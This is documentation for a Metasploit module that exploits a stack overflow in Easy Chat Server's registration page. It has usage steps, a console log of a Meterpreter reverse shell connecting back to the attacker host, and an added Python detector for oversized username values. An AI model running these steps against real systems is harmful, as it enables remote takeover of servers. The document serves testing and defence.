## Description
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter of the registration page 'register.php' is prone to a stack overflow vulnerability.

This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application.

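
For defenders, the following added example (not part of the module or the original documentation) flags requests to the registration page whose `username` value is oversized or carries non-printable bytes. The 64-character limit, the request-line input format, the `chat.php` page in the samples and the handling of both query-string and form-body delivery are assumptions; the page does not say how the parameter is sent.

```python
from urllib.parse import urlsplit, parse_qsl

MAX_USERNAME_LEN = 64          # assumed site policy, not a vendor or module value
TARGET_PAGE = "/register.php"  # registration page named in the description

def username_values(request_line, body=""):
    """Yield username values from the query string and a form-encoded body."""
    _method, _, rest = request_line.partition(" ")
    target, _, _version = rest.rpartition(" ")  # tolerate raw spaces in the target
    url = urlsplit(target)
    if not url.path.lower().endswith(TARGET_PAGE):
        return
    for source in (url.query, body):
        # latin-1 maps every percent-decoded byte to exactly one character
        for key, value in parse_qsl(source, keep_blank_values=True, encoding="latin-1"):
            if key.lower() == "username":
                yield value

def inspect(request_line, body=""):
    """Return the reasons a request to the registration page looks suspicious."""
    reasons = []
    for value in username_values(request_line, body):
        if len(value) > MAX_USERNAME_LEN:
            reasons.append(f"username length {len(value)} exceeds {MAX_USERNAME_LEN}")
        if any(not 0x20 <= ord(ch) <= 0x7E for ch in value):
            reasons.append("username contains non-printable bytes")
    return reasons

# Constructed sample requests (request line, body); not captured traffic.
SAMPLES = [
    ("GET /register.php?username=alice&password=secret HTTP/1.1", ""),
    ("GET /register.php?username=" + "A" * 300 + "&password=x HTTP/1.1", ""),
    ("POST /register.php HTTP/1.1", "username=bob%01%ff&password=x"),
    ("GET /chat.php?username=" + "A" * 300 + " HTTP/1.1", ""),  # other page: ignored
]

def scan(samples):
    """Return (index, reasons) for every sample that triggers a rule."""
    return [(i, r) for i, (line, body) in enumerate(samples) if (r := inspect(line, body))]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLES):
        print(index, "; ".join(reasons))
```
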
## Vulnerable Application

[Easy Chat Server](http://echatserver.com/) is an easy, fast and affordable way to host and manage real-time communication software.

This module has been tested successfully on:

* Easy Chat Server 3.1 on Windows XP En SP3

Installers:

[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)

## Verification Steps

1. Start `msfconsole`
2. Do: `use exploits/windows/http/easychatserver_seh`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed

## Scenarios

```
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >
```